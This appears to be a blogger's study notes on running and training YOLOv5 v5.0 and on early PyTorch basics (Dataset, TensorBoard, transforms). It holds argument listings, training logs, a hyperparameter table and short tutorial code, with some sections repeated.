    hyperparameters: lr0=0.01, lrf=0.2, momentum=0.937, weight_decay=0.0005, warmup_epochs=3.0, warmup_momentum=0.8, warmup_bias_lr=0.1, box=0.05, cls=0.5, cls_pw=1.0, obj=1.0, obj_pw=1.0, iou_t=0.2, anchor_t=4.0, fl_gamma=0.0, hsv_h=0.015, hsv_s=0.7, hsv_v=0.4, degrees=0.0, translate=0.1, scale=0.5, shear=0.0, perspective=0.0, flipud=0.0, fliplr=0.5, mosaic=1.0, mixup=0.0
    wandb: Install Weights & Biases for YOLOv5 logging with 'pip install wandb' (recommended)

    from n params module arguments
    0 -1 1 3520 models.common.Focus [3, 32, 3]
    1 -1 1 18560 models.common.Conv [32, 64, 3, 2]
    2 -1 1 18816 models.common.C3 [64, 64, 1]
    3 -1 1 73984 models.common.Conv [64, 128, 3, 2]
    4 -1 1 156928 models.common.C3 [128, 128, 3]
    5 -1 1 295424 models.common.Conv [128, 256, 3, 2]
    6 -1 1 625152 models.common.C3 [256, 256, 3]
    7 -1 1 1180672 models.common.Conv [256, 512, 3, 2]
    8 -1 1 656896 models.common.SPP [512, 512, [5, 9, 13]]
    9 -1 1 1182720 models.common.C3 [512, 512, 1, False]
    10 -1 1 131584 models.common.Conv [512, 256, 1, 1]
    11 -1 1 0 torch.nn.modules.upsampling.Upsample [None, 2, 'nearest']
    12 [-1, 6] 1 0 models.common.Concat [1]
    13 -1 1 361984 models.common.C3 [512, 256, 1, False]
    14 -1 1 33024 models.common.Conv [256, 128, 1, 1]
    15 -1 1 0 torch.nn.modules.upsampling.Upsample [None, 2, 'nearest']
    16 [-1, 4] 1 0 models.common.Concat [1]
    17 -1 1 90880 models.common.C3 [256, 128, 1, False]
    18 -1 1 147712 models.common.Conv [128, 128, 3, 2]
    19 [-1, 14] 1 0 models.common.Concat [1]
    20 -1 1 296448 models.common.C3 [256, 256, 1, False]
    21 -1 1 590336 models.common.Conv [256, 256, 3, 2]
    22 [-1, 10] 1 0 models.common.Concat [1]
    23 -1 1 1182720 models.common.C3 [512, 512, 1, False]
    24 [17, 20, 23] 1 229245 models.yolo.Detect [80, [[10, 13, 16, 30, 33, 23], [30, 61, 62, 45, 59, 119], [116, 90, 156, 198, 373, 326]], [128, 256, 512]]
    C:\Users\gzjzx\anaconda3\lib\site-packages\torch\functional.py:504: UserWarning: torch.meshgrid: in an upcoming release, it will be required to pass the indexing argument. (Triggered internally at C:\actions-runner\_work\pytorch\pytorch\builder\windows\pytorch\aten\src\ATen\native\TensorShape.cpp:3191.)
    return _VF.meshgrid(tensors, **kwargs) # type: ignore[attr-defined]
    Model Summary: 283 layers, 7276605 parameters, 7276605 gradients, 17.2 GFLOPS

    Transferred 362/362 items from yolov5s.pt
    Scaled weight_decay = 0.0005
    Optimizer groups: 62 .bias, 62 conv.weight, 59 other
    train: Scanning '..\coco128\labels\train2017.cache' images and labels... 126 found, 2 missing, 0 empty, 0 corrupted: 100%|██████████| 128/128 [00:00<?, ?it/s]
    Plotting labels...
    val: Scanning '..\coco128\labels\train2017.cache' images and labels... 126 found, 2 missing, 0 empty, 0 corrupted: 100%|██████████| 128/128 [00:00<?, ?it/s]

    autoanchor: Analyzing anchors... anchors/target = 4.26, Best Possible Recall (BPR) = 0.9946
    Image sizes 640 train, 640 test
    Using 0 dataloader workers
    Logging results to runs\train\exp6
    Starting training for 300 epochs...

    Epoch gpu_mem box obj cls total labels img_size
    0/299 3.06G 0.04553 0.06434 0.02053 0.1304 143 640: 100%|██████████| 8/8 [00:46<00:00, 5.79s/it]
    Class Images Labels P R mAP@.5 mAP@.5:.95: 100%|██████████| 4/4 [00:34<00:00, 8.56s/it]
    all 128 929 0.728 0.557 0.648 0.427

    Epoch gpu_mem box obj cls total labels img_size
    1/299 3.29G 0.04573 0.06658 0.02045 0.1328 158 640: 100%|██████████| 8/8 [00:23<00:00, 2.96s/it]
    Class Images Labels P R mAP@.5 mAP@.5:.95: 100%|██████████| 4/4 [00:09<00:00, 2.32s/it]
    all 128 929 0.718 0.566 0.658 0.433

    Epoch gpu_mem box obj cls total labels img_size
    2/299 3.29G 0.04575 0.07487 0.01959 0.1402 213 640: 38%|███▊ | 3/8 [00:15<00:25, 5.00s/it]
    Process finished with exit code -1

​ It suggests installing wandb, reportedly a nicer visualization tool than TensorBoard.


The YOLOv5 hyperparameter files are data/hyp.finetune.yaml (for the VOC dataset) and data/hyp.scratch.yaml (for the COCO dataset).

Name          Value    Description
lr0           0.00447  learning rate
lrf           0.114    cosine-annealing hyperparameter
momentum      0.873    learning-rate momentum
weight_decay  0.00047  weight-decay coefficient
giou          0.0306   GIoU loss gain
cls           0.211    classification loss gain
cls_pw        0.546    positive-sample weight in the classification BCELoss
obj           0.421    objectness loss gain
obj_pw        0.972    positive-sample weight in the objectness BCELoss
iou_t         0.2      IoU training threshold between labels and anchors
anchor_t      2.26     anchor-multiple threshold: label h/h_a and w/w_a must both lie in (1/2.26, 2.26)
fl_gamma      0.0      0 disables focal loss (efficientDet default is gamma=1.5)
hsv_h         0.0154   hue
hsv_s         0.9      saturation
hsv_v         0.619    value (brightness)
degrees       0.404    rotation angle
translate     0.206    horizontal and vertical translation
scale         0.86     scaling
shear         0.795    shear
perspective   0.0      perspective-transform parameter
flipud        0.00756  vertical flip
fliplr        0.5      horizontal flip
mixup         0.153    mixup ratio

​ The arguments defined under if __name__ == '__main__'::

    parser = argparse.ArgumentParser()
    parser.add_argument('--weights', type=str, default='yolov5s.pt', help='initial weights path')
    parser.add_argument('--cfg', type=str, default='', help='model.yaml path')
    parser.add_argument('--data', type=str, default='data/coco128.yaml', help='data.yaml path')
    parser.add_argument('--hyp', type=str, default='data/hyp.scratch.yaml', help='hyperparameters path')
    parser.add_argument('--epochs', type=int, default=300)
    parser.add_argument('--batch-size', type=int, default=16, help='total batch size for all GPUs')
    parser.add_argument('--img-size', nargs='+', type=int, default=[640, 640], help='[train, test] image sizes')
    parser.add_argument('--rect', action='store_true', help='rectangular training')
    parser.add_argument('--resume', nargs='?', const=True, default=False, help='resume most recent training')
    parser.add_argument('--nosave', action='store_true', help='only save final checkpoint')
    parser.add_argument('--notest', action='store_true', help='only test final epoch')
    parser.add_argument('--noautoanchor', action='store_true', help='disable autoanchor check')
    parser.add_argument('--evolve', action='store_true', help='evolve hyperparameters')
    parser.add_argument('--bucket', type=str, default='', help='gsutil bucket')
    parser.add_argument('--cache-images', action='store_true', help='cache images for faster training')
    parser.add_argument('--image-weights', action='store_true', help='use weighted image selection for training')
    parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
    parser.add_argument('--multi-scale', action='store_true', help='vary img-size +/- 50%%')
    parser.add_argument('--single-cls', action='store_true', help='train multi-class data as single-class')
    parser.add_argument('--adam', action='store_true', help='use torch.optim.Adam() optimizer')
    parser.add_argument('--sync-bn', action='store_true', help='use SyncBatchNorm, only available in DDP mode')
    parser.add_argument('--local_rank', type=int, default=-1, help='DDP parameter, do not modify')
    parser.add_argument('--workers', type=int, default=0, help='maximum number of dataloader workers')
    parser.add_argument('--project', default='runs/train', help='save to project/name')
    parser.add_argument('--entity', default=None, help='W&B entity')
    parser.add_argument('--name', default='exp', help='save to project/name')
    parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
    parser.add_argument('--quad', action='store_true', help='quad dataloader')
    parser.add_argument('--linear-lr', action='store_true', help='linear LR')
    parser.add_argument('--label-smoothing', type=float, default=0.0, help='Label smoothing epsilon')
    parser.add_argument('--upload_dataset', action='store_true', help='Upload dataset as W&B artifact table')
    parser.add_argument('--bbox_interval', type=int, default=-1, help='Set bounding-box image logging interval for W&B')
    parser.add_argument('--save_period', type=int, default=-1, help='Log model after every "save_period" epoch')
    parser.add_argument('--artifact_alias', type=str, default="latest", help='version of dataset artifact to be used')
    opt = parser.parse_args()

Training the YOLOv5 model (cloud GPU)

    ]]>
    + 视频

    仓库

    课程

    课程介绍

    1. 项目介绍及环境配置
    2. 如何利用 YOLOv5 进行预测
    3. 如何训练 YOLOv5 神经网络
    4. 如何制作和训练自己的数据集
    5. 理解预测代码组织和结构
    6. 理解训练代码组织和结构
    7. 带你重写代码(有机会的话)

    项目介绍及环境配置

    从 github 官网上爬取项目。

    为了保证与讲解视频一致,选择 v5.0 版本(是 yolov5 的 5.0 版本,不是 yolo 的 5.0 版本),下载代码时选择 Download ZIP

    查看 README.md

    Python 3.8 or later with all requirements.txt dependencies installed, including torch>=1.7. To install run:

    1
    $ pip install -r requirements.txt

    使用 Pycharm 打开项目,配环境:

    1
    conda create -n yolo python=3.9
    1
    conda activate yolo
    1
    pip install -r requirements.txt

    1. 选择特定 Tags 的文件,以保持和视频中代码的一致
    2. 在 PyCharm 中配置对应的 Conda 环境
    3. 如果作者提供 requirments.txt 文件:
      • 可以利用 PyCharm 自带的智能提示进行安装
      • 或者利用 pip install-r requirements.txt 指令进行安装
    4. 如果作者没有提供 requirments.txt 文件
      • 根据运行报错信息,百度,手动安装缺少的库

    如何利用 YOLOv5 进行预测(一)

    ​ 在 README.md 中可以看到如何导入训练好的模型文件对图像进行预测:

    detect.py runs inference on a variety of sources, downloading models automatically from the latest YOLOv5 release and saving results to runs/detect.

    1
    2
    3
    4
    5
    6
    7
    $ python detect.py --source 0  # webcam
    file.jpg # image
    file.mp4 # video
    path/ # directory
    path/*.jpg # glob
    'https://youtu.be/NUsoVlDFqZg' # YouTube video
    'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP stream

    ​ 官方文档推荐用命令行设置相应的 parser 参数开始预测,但是也可以使用 pycharm 启动。

    ​ 打开 detect.py:

    if __name__ == '__main__': 中会有包 import argparse 中的 parser 参数,通过命令行运行这个文件可以设置这些参数:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
    parser.add_argument('--source', type=str, default='data/images', help='source') # file/folder, 0 for webcam
    parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)')
    parser.add_argument('--conf-thres', type=float, default=0.25, help='object confidence threshold')
    parser.add_argument('--iou-thres', type=float, default=0.45, help='IOU threshold for NMS')
    parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
    parser.add_argument('--view-img', action='store_true', help='display results')
    parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
    parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
    parser.add_argument('--nosave', action='store_true', help='do not save images/videos')
    parser.add_argument('--classes', nargs='+', type=int, help='filter by class: --class 0, or --class 0 2 3')
    parser.add_argument('--agnostic-nms', action='store_true', help='class-agnostic NMS')
    parser.add_argument('--augment', action='store_true', help='augmented inference')
    parser.add_argument('--update', action='store_true', help='update all models')
    parser.add_argument('--project', default='runs/detect', help='save results to project/name')
    parser.add_argument('--name', default='exp', help='save results to project/name')
    parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
    opt = parser.parse_args()
    print(opt)
    check_requirements(exclude=('pycocotools', 'thop'))

    with torch.no_grad():
    if opt.update: # update all models (to fix SourceChangeWarning)
    for opt.weights in ['yolov5s.pt', 'yolov5m.pt', 'yolov5l.pt', 'yolov5x.pt']:
    detect()
    strip_optimizer(opt.weights)
    else:
    detect()

    ​ 运行后会根据 --weights 的默认值 yolov5s.pt 下载模型文件:https://github.com/ultralytics/yoloy5/releases/download/y5.0/yolov5s.pt,也可以换其他的模型:`yolov5m.pt`、`yolov5l.pt`、`yolov5x.pt`。

    png

    ​ 然后根据 --source 的默认值 data/images 读取输入。

    ​ 生成的 --project 的默认值 runs/detect 将预测后的结果保存至相应的文件夹。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    Namespace(weights='yolov5s.pt', source='data/images', img_size=640, conf_thres=0.25, iou_thres=0.45, device='', view_img=False, save_txt=False, save_conf=False, nosave=False, classes=None, agnostic_nms=False, augment=False, update=False, project='runs/detect', name='exp', exist_ok=False)
    YOLOv5 2021-4-12 torch 2.0.0+cpu CPU

    Fusing layers...
    C:\Users\gzjzx\anaconda3\envs\yolo\lib\site-packages\torch\functional.py:504: UserWarning: torch.meshgrid: in an upcoming release, it will be required to pass the indexing argument. (Triggered internally at C:\actions-runner\_work\pytorch\pytorch\builder\windows\pytorch\aten\src\ATen\native\TensorShape.cpp:3484.)
    return _VF.meshgrid(tensors, **kwargs) # type: ignore[attr-defined]
    Model Summary: 224 layers, 7266973 parameters, 0 gradients, 17.0 GFLOPS
    image 1/2 D:\Study\1st-year-master\yolov5-5.0\data\images\bus.jpg: 640x480 4 persons, 1 bus, 1 fire hydrant, Done. (1.685s)
    image 2/2 D:\Study\1st-year-master\yolov5-5.0\data\images\zidane.jpg: 384x640 2 persons, 2 ties, Done. (0.973s)
    Results saved to runs\detect\exp14
    Done. (3.025s)

    jpg

    坑点:

    如何利用 YOLOv5 进行预测(二)

    ​ 这章主要讲了剩下的参数的用法。

    ​ 可以在 pycharm 中的 Edit Configurations...Parameters 中设置参数。

    png

    • --img-size 在导入图片时,会把图片缩放至一定大小的图片作为输入。

    • --conf-thres 置信阈值,只有检测结果大于该阈值的才会在输出中展示。

    • --iou-thres

      • IOU:交并比,Intersection over Union
      • NMS:非极大值抑制,Non Max Suppression
      • NMS(non_max_suppression) - 知乎 (zhihu.com)。在预测任务中,会出现很多冗余的预测框。通过NMS操作可以有效的删除冗余检测的结果。非极大值抑制(NMS)顾名思义就是抑制不是极大值的元素,搜索局部的极大值。大于该值的框框将被合并。
    • --device 使用设备,可选 cuda 或 cpu

    • --view-img 预测后是否显示图片

    • --save-txt 预测后会把框框的坐标信息保存到 txt 中

    • --save-conf 预测后将置信度保存到 txt 中

    • --nosave 是否保存预测结果图

    • --classes 设置只保留某一部分类别, 形如 0 或者 0 2 3, 使用 --classes = n, 则在路径 runs/detect/exp*/ 下保存的图片为 n 所对应的类别, 此时需要设置 data

    • --agnostic-nms进行 NMS 去除不同类别之间的框, 默认 False

    • --augment TTA测试时增强/多尺度预测

    • --visualize 是否可视化网络层输出特征

    • --update 如果为True,则对所有模型进行 strip_optimizer 操作,去除pt文件中的优化器等信息,默认为 False

    • --project 保存测试日志的文件夹路径

    • --name 保存测试日志文件夹的名字, 所以最终是保存在 project/name

    • --exist_ok 是否重新创建日志文件, False时重新创建文件

    一点小补充

    1
    2
    opt = parser.parse_args()
    print(opt)

    ​ 这两行代码就是解析之前设置的参数用。

    训练YOLOv5模型(本地)

    ​ 运行 train.py 就可以本地训练 YOLOv5 模型。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    github: skipping check (not a git repository)
    YOLOv5 2021-4-12 torch 1.13.1+cu117 CUDA:0 (NVIDIA GeForce MX330, 4095.875MB)

    Namespace(weights='yolov5s.pt', cfg='', data='data/coco128.yaml', hyp='data/hyp.scratch.yaml', epochs=300, batch_size=16, img_size=[640, 640], rect=False, resume=False, nosave=False, notest=False, noautoanchor=False, evolve=False, bucket='', cache_images=False, image_weights=False, device='', multi_scale=False, single_cls=False, adam=False, sync_bn=False, local_rank=-1, workers=0, project='runs/train', entity=None, name='exp', exist_ok=False, quad=False, linear_lr=False, label_smoothing=0.0, upload_dataset=False, bbox_interval=-1, save_period=-1, artifact_alias='latest', world_size=1, global_rank=-1, save_dir='runs\\train\\exp6', total_batch_size=16)
    tensorboard: Start with 'tensorboard --logdir runs/train', view at http://localhost:6006/
    hyperparameters: lr0=0.01, lrf=0.2, momentum=0.937, weight_decay=0.0005, warmup_epochs=3.0, warmup_momentum=0.8, warmup_bias_lr=0.1, box=0.05, cls=0.5, cls_pw=1.0, obj=1.0, obj_pw=1.0, iou_t=0.2, anchor_t=4.0, fl_gamma=0.0, hsv_h=0.015, hsv_s=0.7, hsv_v=0.4, degrees=0.0, translate=0.1, scale=0.5, shear=0.0, perspective=0.0, flipud=0.0, fliplr=0.5, mosaic=1.0, mixup=0.0
    wandb: Install Weights & Biases for YOLOv5 logging with 'pip install wandb' (recommended)

    from n params module arguments
    0 -1 1 3520 models.common.Focus [3, 32, 3]
    1 -1 1 18560 models.common.Conv [32, 64, 3, 2]
    2 -1 1 18816 models.common.C3 [64, 64, 1]
    3 -1 1 73984 models.common.Conv [64, 128, 3, 2]
    4 -1 1 156928 models.common.C3 [128, 128, 3]
    5 -1 1 295424 models.common.Conv [128, 256, 3, 2]
    6 -1 1 625152 models.common.C3 [256, 256, 3]
    7 -1 1 1180672 models.common.Conv [256, 512, 3, 2]
    8 -1 1 656896 models.common.SPP [512, 512, [5, 9, 13]]
    9 -1 1 1182720 models.common.C3 [512, 512, 1, False]
    10 -1 1 131584 models.common.Conv [512, 256, 1, 1]
    11 -1 1 0 torch.nn.modules.upsampling.Upsample [None, 2, 'nearest']
    12 [-1, 6] 1 0 models.common.Concat [1]
    13 -1 1 361984 models.common.C3 [512, 256, 1, False]
    14 -1 1 33024 models.common.Conv [256, 128, 1, 1]
    15 -1 1 0 torch.nn.modules.upsampling.Upsample [None, 2, 'nearest']
    16 [-1, 4] 1 0 models.common.Concat [1]
    17 -1 1 90880 models.common.C3 [256, 128, 1, False]
    18 -1 1 147712 models.common.Conv [128, 128, 3, 2]
    19 [-1, 14] 1 0 models.common.Concat [1]
    20 -1 1 296448 models.common.C3 [256, 256, 1, False]
    21 -1 1 590336 models.common.Conv [256, 256, 3, 2]
    22 [-1, 10] 1 0 models.common.Concat [1]
    23 -1 1 1182720 models.common.C3 [512, 512, 1, False]
    24 [17, 20, 23] 1 229245 models.yolo.Detect [80, [[10, 13, 16, 30, 33, 23], [30, 61, 62, 45, 59, 119], [116, 90, 156, 198, 373, 326]], [128, 256, 512]]
    C:\Users\gzjzx\anaconda3\lib\site-packages\torch\functional.py:504: UserWarning: torch.meshgrid: in an upcoming release, it will be required to pass the indexing argument. (Triggered internally at C:\actions-runner\_work\pytorch\pytorch\builder\windows\pytorch\aten\src\ATen\native\TensorShape.cpp:3191.)
    return _VF.meshgrid(tensors, **kwargs) # type: ignore[attr-defined]
    Model Summary: 283 layers, 7276605 parameters, 7276605 gradients, 17.2 GFLOPS

    Transferred 362/362 items from yolov5s.pt
    Scaled weight_decay = 0.0005
    Optimizer groups: 62 .bias, 62 conv.weight, 59 other
    train: Scanning '..\coco128\labels\train2017.cache' images and labels... 126 found, 2 missing, 0 empty, 0 corrupted: 100%|██████████| 128/128 [00:00<?, ?it/s]
    Plotting labels...
    val: Scanning '..\coco128\labels\train2017.cache' images and labels... 126 found, 2 missing, 0 empty, 0 corrupted: 100%|██████████| 128/128 [00:00<?, ?it/s]

    autoanchor: Analyzing anchors... anchors/target = 4.26, Best Possible Recall (BPR) = 0.9946
    Image sizes 640 train, 640 test
    Using 0 dataloader workers
    Logging results to runs\train\exp6
    Starting training for 300 epochs...

    Epoch gpu_mem box obj cls total labels img_size
    0/299 3.06G 0.04553 0.06434 0.02053 0.1304 143 640: 100%|██████████| 8/8 [00:46<00:00, 5.79s/it]
    Class Images Labels P R mAP@.5 mAP@.5:.95: 100%|██████████| 4/4 [00:34<00:00, 8.56s/it]
    all 128 929 0.728 0.557 0.648 0.427

    Epoch gpu_mem box obj cls total labels img_size
    1/299 3.29G 0.04573 0.06658 0.02045 0.1328 158 640: 100%|██████████| 8/8 [00:23<00:00, 2.96s/it]
    Class Images Labels P R mAP@.5 mAP@.5:.95: 100%|██████████| 4/4 [00:09<00:00, 2.32s/it]
    all 128 929 0.718 0.566 0.658 0.433

    Epoch gpu_mem box obj cls total labels img_size
    2/299 3.29G 0.04575 0.07487 0.01959 0.1402 213 640: 38%|███▊ | 3/8 [00:15<00:25, 5.00s/it]
    Process finished with exit code -1

The log suggests installing wandb, which is said to be an even handier visualization tool than TensorBoard.


YOLOv5's hyperparameter files are data/hyp.finetune.yaml (for the VOC dataset) and data/hyp.scratch.yaml (for the COCO dataset).

Each hyperparameter, with an example value and its meaning:

• lr0 (0.00447): initial learning rate
• lrf (0.114): cosine-annealing LR hyperparameter (final LR = lr0 * lrf)
• momentum (0.873): learning-rate momentum
• weight_decay (0.00047): weight-decay coefficient
• giou (0.0306): GIoU loss gain
• cls (0.211): classification loss gain
• cls_pw (0.546): positive-sample weight in the classification BCELoss
• obj (0.421): objectness loss gain
• obj_pw (0.972): positive-sample weight in the objectness BCELoss
• iou_t (0.2): IoU training threshold between labels and anchors
• anchor_t (2.26): anchor-multiple threshold; the label/anchor ratios h/h_a and w/w_a must both lie in (1/2.26, 2.26)
• fl_gamma (0.0): focal-loss gamma; 0 disables focal loss (the EfficientDet default is gamma=1.5)
• hsv_h (0.0154): hue augmentation
• hsv_s (0.9): saturation augmentation
• hsv_v (0.619): value (brightness) augmentation
• degrees (0.404): rotation angle
• translate (0.206): horizontal and vertical translation
• scale (0.86): scaling
• shear (0.795): shear
• perspective (0.0): perspective-transform parameter
• flipud (0.00756): probability of a vertical flip
• fliplr (0.5): probability of a horizontal flip
• mixup (0.153): mixup coefficient
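
The values a given run actually used can be inspected by loading the hyp file the way train.py itself does; a minimal sketch, assuming PyYAML (which YOLOv5 already requires) and the default data/hyp.scratch.yaml path:

import yaml

# Load the same hyperparameter dict that train.py reads from --hyp.
with open('data/hyp.scratch.yaml') as f:
    hyp = yaml.safe_load(f)

print(hyp['lr0'], hyp['lrf'], hyp['mosaic'])  # 0.01 0.2 1.0 for the run logged above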

The configurable arguments can be seen under if __name__ == '__main__':

import argparse

parser = argparse.ArgumentParser()
    parser.add_argument('--weights', type=str, default='yolov5s.pt', help='initial weights path')
    parser.add_argument('--cfg', type=str, default='', help='model.yaml path')
    parser.add_argument('--data', type=str, default='data/coco128.yaml', help='data.yaml path')
    parser.add_argument('--hyp', type=str, default='data/hyp.scratch.yaml', help='hyperparameters path')
    parser.add_argument('--epochs', type=int, default=300)
    parser.add_argument('--batch-size', type=int, default=16, help='total batch size for all GPUs')
    parser.add_argument('--img-size', nargs='+', type=int, default=[640, 640], help='[train, test] image sizes')
    parser.add_argument('--rect', action='store_true', help='rectangular training')
    parser.add_argument('--resume', nargs='?', const=True, default=False, help='resume most recent training')
    parser.add_argument('--nosave', action='store_true', help='only save final checkpoint')
    parser.add_argument('--notest', action='store_true', help='only test final epoch')
    parser.add_argument('--noautoanchor', action='store_true', help='disable autoanchor check')
    parser.add_argument('--evolve', action='store_true', help='evolve hyperparameters')
    parser.add_argument('--bucket', type=str, default='', help='gsutil bucket')
    parser.add_argument('--cache-images', action='store_true', help='cache images for faster training')
    parser.add_argument('--image-weights', action='store_true', help='use weighted image selection for training')
    parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
    parser.add_argument('--multi-scale', action='store_true', help='vary img-size +/- 50%%')
    parser.add_argument('--single-cls', action='store_true', help='train multi-class data as single-class')
    parser.add_argument('--adam', action='store_true', help='use torch.optim.Adam() optimizer')
    parser.add_argument('--sync-bn', action='store_true', help='use SyncBatchNorm, only available in DDP mode')
    parser.add_argument('--local_rank', type=int, default=-1, help='DDP parameter, do not modify')
    parser.add_argument('--workers', type=int, default=0, help='maximum number of dataloader workers')
    parser.add_argument('--project', default='runs/train', help='save to project/name')
    parser.add_argument('--entity', default=None, help='W&B entity')
    parser.add_argument('--name', default='exp', help='save to project/name')
    parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
    parser.add_argument('--quad', action='store_true', help='quad dataloader')
    parser.add_argument('--linear-lr', action='store_true', help='linear LR')
    parser.add_argument('--label-smoothing', type=float, default=0.0, help='Label smoothing epsilon')
    parser.add_argument('--upload_dataset', action='store_true', help='Upload dataset as W&B artifact table')
    parser.add_argument('--bbox_interval', type=int, default=-1, help='Set bounding-box image logging interval for W&B')
    parser.add_argument('--save_period', type=int, default=-1, help='Log model after every "save_period" epoch')
    parser.add_argument('--artifact_alias', type=str, default="latest", help='version of dataset artifact to be used')
    opt = parser.parse_args()

Training the YOLOv5 model (on a cloud GPU)

Pytorch 深度学习快速入门教程(绝对通俗易懂!)【小土堆】 (a quick-start PyTorch deep-learning tutorial by 小土堆)

Video

Course

The two go-to helper functions for learning Python (they work for PyTorch too)

from torch.utils.data import Dataset
help(Dataset)  # works in any Python interpreter
Dataset??      # IPython/Jupyter syntax; also shows the source code

A first look at data loading in PyTorch

PyTorch has two classes:

• Dataset: provides a way to fetch the data and their labels
  • how to fetch each sample and its label
  • how many samples there are in total
• DataLoader: packages the data into the forms the downstream network consumes

Hands-on with the Dataset class


Download the data package: a binary classification problem of ants vs. bees. The training-set root directory is dataset/train, and the labels are ants and bees.

Design a class MyData that is responsible for reading the dataset:

from torch.utils.data import Dataset
from PIL import Image
import os


class MyData(Dataset):

    def __init__(self, root_dir, label_dir):
        """
        Initialization.
        :param root_dir: root directory
        :param label_dir: label directory
        """
        self.root_dir = root_dir
        self.label_dir = label_dir
        self.path = os.path.join(self.root_dir, self.label_dir)
        self.img_path = os.listdir(self.path)

    def __getitem__(self, idx):
        """
        Fetch one sample.
        :param idx: index
        :return: (image, label)
        """
        img_name = self.img_path[idx]
        img_item_path = os.path.join(self.root_dir, self.label_dir, img_name)
        img = Image.open(img_item_path)
        label = self.label_dir
        return img, label

    def __len__(self):
        return len(self.img_path)


root_dir = "dataset/train"
ants_label_dir = "ants"
bees_label_dir = "bees"
ants_dataset = MyData(root_dir, ants_label_dir)
bees_dataset = MyData(root_dir, bees_label_dir)
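
Since both objects implement the Dataset interface, they can be concatenated with +, which returns a torch.utils.data.ConcatDataset; a small check:

train_dataset = ants_dataset + bees_dataset   # Dataset.__add__ builds a ConcatDataset
print(len(train_dataset) == len(ants_dataset) + len(bees_dataset))  # True
img, label = train_dataset[0]                 # still indexes like a single dataset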

Using TensorBoard (1)

Use PyTorch's TensorBoard support to display the function $y=2x$ in the browser:

    from torch.utils.tensorboard import SummaryWriter

    writer = SummaryWriter("logs")

for i in range(100):
    writer.add_scalar("y=2x", 2 * i, i)

    writer.close()

In the shell, run tensorboard --logdir=logs (start TensorBoard with logs as the log directory):

    PS D:\Study\1st-year-master\XiaoTuDui\Test> tensorboard --logdir=logs
    Serving TensorBoard on localhost; to expose to the network, use a proxy or pass --bind_all
    TensorBoard 2.9.1 at http://localhost:6006/ (Press CTRL+C to quit)


If two writer.add_scalar calls write to the same tag, the old and new curves can get blended into one confusing chart; clearing the cached event files under logs/ and refreshing fixes this.

Using TensorBoard (2)

This part mainly covers the usage of writer.add_image.

def add_image(self, tag, img_tensor, global_step=None, walltime=None, dataformats="CHW"):
    """Add image data to summary.

    Note that this requires the ``pillow`` package.

    Args:
        tag (str): Data identifier
        img_tensor (torch.Tensor, numpy.ndarray, or string/blobname): Image data
        global_step (int): Global step value to record
        walltime (float): Optional override default walltime (time.time())
            seconds after epoch of event
        dataformats (str): Image data format specification of the form
            CHW, HWC, HW, WH, etc.

    Shape:
        img_tensor: Default is :math:`(3, H, W)`. You can use ``torchvision.utils.make_grid()`` to
        convert a batch of tensor into 3xHxW format or call ``add_images`` and let us do the job.
        Tensor with :math:`(1, H, W)`, :math:`(H, W)`, :math:`(H, W, 3)` is also suitable as long as
        corresponding ``dataformats`` argument is passed, e.g. ``CHW``, ``HWC``, ``HW``.

    Examples::

        from torch.utils.tensorboard import SummaryWriter
        import numpy as np
        img = np.zeros((3, 100, 100))
        img[0] = np.arange(0, 10000).reshape(100, 100) / 10000
        img[1] = 1 - np.arange(0, 10000).reshape(100, 100) / 10000

        img_HWC = np.zeros((100, 100, 3))
        img_HWC[:, :, 0] = np.arange(0, 10000).reshape(100, 100) / 10000
        img_HWC[:, :, 1] = 1 - np.arange(0, 10000).reshape(100, 100) / 10000

        writer = SummaryWriter()
        writer.add_image('my_image', img, 0)

        # If you have non-default dimension setting, set the dataformats argument.
        writer.add_image('my_image_HWC', img_HWC, 0, dataformats='HWC')
        writer.close()

    Expected result: the image rendered in TensorBoard (_static/img/tensorboard/add_image.png).
    """

When going from PIL to numpy, you need to tell add_image() what each number/dimension of the shape means: dataformats="HWC" (height, width, channels).

    from torch.utils.tensorboard import SummaryWriter
    import numpy as np
    from PIL import Image

    writer = SummaryWriter("logs")
    image_path = r"dataset\train\ants\0013035.jpg"
    img_PIL = Image.open(image_path)
    img_array = np.array(img_PIL)
    print(type(img_array))
    print(img_array.shape)

    writer.add_image("test", img_array, 2, dataformats="HWC")
for i in range(100):
    writer.add_scalar("y=2x", 2 * i, i)

    writer.close()


Using Transforms

transforms is a toolbox: an image is read in, passes through a transform, and a result comes out.

transforms.ToTensor() converts the Image format into the tensor format.

    from torchvision import transforms
    from PIL import Image
    from torch.utils.tensorboard import SummaryWriter

    img_path = r"dataset/train/ants/0013035.jpg"
    img = Image.open(img_path)

    writer = SummaryWriter("logs")

# how a transform object is used
    tensor_trans = transforms.ToTensor()
    tensor_img = tensor_trans(img)

    print(tensor_img)

    writer.add_image("Tensor_img", tensor_img)

    writer.close()

Common Transforms (1)

Covers the usage of transforms.Normalize.

class Normalize(torch.nn.Module):
    """Normalize a tensor image with mean and standard deviation.
    This transform does not support PIL Image.
    Given mean: ``(mean[1],...,mean[n])`` and std: ``(std[1],..,std[n])`` for ``n``
    channels, this transform will normalize each channel of the input
    ``torch.*Tensor`` i.e.,
    ``output[channel] = (input[channel] - mean[channel]) / std[channel]``

    .. note::
